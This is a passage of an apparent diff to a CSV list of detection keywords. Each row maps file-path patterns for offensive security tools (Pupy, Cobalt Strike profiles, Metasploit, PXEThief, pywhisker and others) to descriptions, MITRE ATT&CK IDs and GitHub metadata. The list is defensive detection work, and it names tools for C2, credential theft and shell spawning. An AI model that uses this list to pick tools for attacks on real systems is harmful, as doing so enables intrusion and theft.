T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupylib/payloads/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyOffload.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupyps.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyServer.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyService.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupysh.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyTriggers.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyWeb.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/putter.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/PwnDB.py*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. 
Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" "*/pwndrop.git*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*/pwndrop.ini*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" -"*/Pwned.as*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/Pwned.as*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/PwnKit-Exploit*","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","79","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" -"*/pxesploit/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/pxesploit/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/PXEThief*","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z" -"*/pxexploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/py_oneliner.py*","offensive_tool_keyword","pupy","Pupy is an opensource. 
cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pxexploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/py_oneliner.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/pyasn1/*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*/pycobalt-*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python 
API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*/pycobalt/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" 
@@ -4884,7 +4931,7 @@
 "*/pyrdp:latest*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z"
 "*/Pysoserial.git*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z"
 "*/pystinger.zip*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z"
-"*/Python-dynload-os.h*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/Python-dynload-os.h*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
 "*/pywerview*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z"
 "*/pywhisker.git*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z"
 "*/pywsus.git*","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","1","N/A","N/A","3","248","38","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z"
@@ -4898,18 +4945,18 @@ "*/quake3-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/quake3-master-getservers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/quantloader.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" -"*/Quasar.git*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*/Quasar.v*.zip*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*/Quasar/releases*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote 